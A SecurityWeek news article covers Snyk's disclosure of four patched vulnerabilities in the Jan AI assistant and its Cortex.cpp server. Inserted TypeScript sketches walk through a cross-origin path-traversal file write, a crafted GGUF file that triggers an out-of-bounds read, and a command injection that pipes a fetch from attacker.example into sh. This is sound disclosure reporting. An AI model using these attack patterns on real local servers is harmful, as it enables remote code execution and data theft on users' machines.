
Artificial Intelligence

Vulnerabilities Expose Jan AI Systems to Remote Manipulation

Vulnerabilities in open source ChatGPT alternative Jan AI expose systems to remote, unauthenticated manipulation.

Multiple vulnerabilities in Jan AI, which is advertised as an open source ChatGPT alternative, could be exploited by remote, unauthenticated attackers to manipulate systems, developer security platform Snyk warns.

Developed by Menlo Research, Jan AI is a personal assistant that runs offline on desktops and mobile devices, featuring a library of popular LLMs and support for extensions that enable customization.

Jan, which has over one million downloads on GitHub, allows users to download and run LLMs locally, without depending on cloud hosting services, while retaining full control over the AI.

The assistant is powered by Menlo’s self-hosted AI engine Cortex.cpp, which functions as the backend API server, and has an Electron application as a user interface. Through Cortex, users can pull models from a dedicated hub and from HuggingFace, and can import local models stored in the GGUF file format.

Because Jan and Cortex are meant to operate locally, they lack authentication, which leaves them exposed to attacks launched from malicious webpages the user visits.

Snyk’s analysis of the AI assistant uncovered a function for uploading files to the server that lacked sanitization, which could be exploited by a malicious page to write arbitrary files to the machine.
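For illustration, such a cross-origin file write needs nothing more than JavaScript running in a page the victim visits. The sketch below is hypothetical: the port, route, and field names are placeholders rather than the actual Cortex.cpp API, and it assumes the server joins the supplied filename to an upload directory without sanitizing it.

```typescript
// Hypothetical sketch of a cross-origin arbitrary file write against an
// unauthenticated local API server. The port, route, and field names are
// placeholders, not the documented Cortex.cpp API.
const API = "http://127.0.0.1:1337"; // placeholder local port

const form = new FormData();
// A path-traversal filename escapes the intended upload directory, so the
// file lands wherever the attacker chooses on the victim's disk.
form.append("file", new Blob(["crafted GGUF bytes"]), "../../../../tmp/evil.gguf");

// No authentication is required, and the browser sends this simple POST even
// though CORS prevents the page from reading the response.
await fetch(`${API}/files/upload`, { method: "POST", mode: "no-cors", body: form });
```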

Further investigation revealed out-of-bounds issues in Jan’s GGUF parser, as well as a lack of cross-site request forgery (CSRF) protection on its server, which could be exploited on non-GET endpoints despite Cortex having cross-origin resource sharing (CORS) implemented.

By exploiting the cross-origin arbitrary file write flaw, an attacker could write a crafted GGUF file to the server, then abuse the lack of CSRF protection to import it and trigger an out-of-bounds read that leaks adjacent memory into a metadata field under the attacker’s control.
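GGUF stores model metadata as length-prefixed key/value pairs, so a parser that trusts a declared string length can be made to read past the end of the mapped file. The snippet below is a simplified illustration of that class of bug, not Snyk’s actual proof of concept: it builds a minimal GGUF header whose single metadata string claims to be far longer than the data actually written.

```typescript
// Illustrative only: a minimal GGUF file whose single metadata string declares
// a length far larger than the bytes actually present, the class of bug that
// lets a trusting parser copy out-of-bounds memory into the metadata value.
const enc = new TextEncoder();
const u32 = (n: number) => {
  const b = new DataView(new ArrayBuffer(4)); b.setUint32(0, n, true);
  return new Uint8Array(b.buffer);
};
const u64 = (n: bigint) => {
  const b = new DataView(new ArrayBuffer(8)); b.setBigUint64(0, n, true);
  return new Uint8Array(b.buffer);
};
const ggufString = (s: string) => {
  const bytes = enc.encode(s);
  return [u64(BigInt(bytes.length)), bytes];
};

const GGUF_TYPE_STRING = 8;
const parts: Uint8Array[] = [
  enc.encode("GGUF"),            // magic
  u32(3),                        // format version
  u64(0n),                       // tensor count
  u64(1n),                       // metadata key/value count
  ...ggufString("general.name"), // metadata key
  u32(GGUF_TYPE_STRING),         // value type: string
  u64(65536n),                   // declared string length: 64 KiB...
  enc.encode("x"),               // ...backed by a single byte of real data
];

// Concatenating the parts yields evil.gguf; a parser that trusts the declared
// length reads past the end of the file and into adjacent memory.
const evil = new Uint8Array(parts.flatMap(p => [...p]));
```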

By sending a cross-origin request, the attacker can update the server’s configuration to disable CORS entirely, and then read back the leaked data with a request to the model’s metadata endpoint, Snyk says.
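Put together, the chain could plausibly be driven end to end from a malicious webpage, roughly as sketched below. The port, routes, and request bodies are placeholders standing in for the model-import, configuration, and metadata endpoints, which the article does not name.

```typescript
// Hypothetical sketch of the full chain driven from a malicious webpage. The
// port, routes, and request bodies are placeholders, not the actual Cortex.cpp API.
const API = "http://127.0.0.1:1337"; // placeholder local port

// Simple cross-origin POSTs go out without a preflight; the server processes
// them even though the attacker's page cannot read the responses yet.
const blindPost = (path: string, body: unknown) =>
  fetch(`${API}${path}`, { method: "POST", mode: "no-cors", body: JSON.stringify(body) });

// 1. Import the crafted GGUF file written to disk in the previous step.
await blindPost("/models/import", { path: "/tmp/evil.gguf" });

// 2. Rewrite the server configuration so CORS no longer blocks responses.
await blindPost("/configs/update", { cors: false });

// 3. With CORS disabled, read the model metadata that now carries the leaked memory.
const leaked = await (await fetch(`${API}/models/evil`)).json();
console.log(leaked);
```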

“Leaking data over the network with a GGUF file is pretty neat, but this doesn’t come without some limitations. We can’t control what gets mapped after our crafted model file; hence there’s no way to tell if we can leak sensitive data,” the security firm notes.

The AI assistant was also found to be vulnerable to remote code execution (RCE) through Cortex.cpp’s support for the python-engine. Because the engine is a C++ wrapper that executes the Python binary, an attacker can update the model configuration to inject a payload into the command that launches the binary, triggering command execution when the model starts.
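A hypothetical sketch of that last step follows; the route and field names are placeholders, and it assumes a model configuration value is interpolated unescaped into the shell command that starts the Python binary.

```typescript
// Hypothetical sketch of the command-injection vector. The route and field
// names are placeholders; the assumption is that a configuration value ends
// up inside the shell command used to launch the Python binary.
const API = "http://127.0.0.1:1337"; // placeholder local port

await fetch(`${API}/models/update`, {
  method: "POST",
  mode: "no-cors", // sent cross-origin; the response is never needed
  body: JSON.stringify({
    model: "evil",
    // Shell metacharacters break out of the launch command (placeholder field).
    python_binary: "/usr/bin/python3; curl https://attacker.example/x | sh",
  }),
});
// The injected command runs the next time the model is started.
```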

Snyk reported its findings to Menlo on February 18 and all issues were addressed by March 6. Four CVEs were issued: CVE-2025-2446 (arbitrary file write via path traversal), CVE-2025-2439 (out-of-bounds read in the GGUF parser), CVE-2025-2445 (command injection in the Python engine model update), and CVE-2025-2447 (missing CSRF protection).

Related: New AI Security Tool Helps Organizations Set Trust Zones for Gen-AI Models

Related: New Jailbreak Technique Uses Fictional World to Manipulate AI

Related: New CCA Jailbreak Method Works Against Most AI Models

Related: Prompt Security Raises $18 Million for Gen-AI Security Platform

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
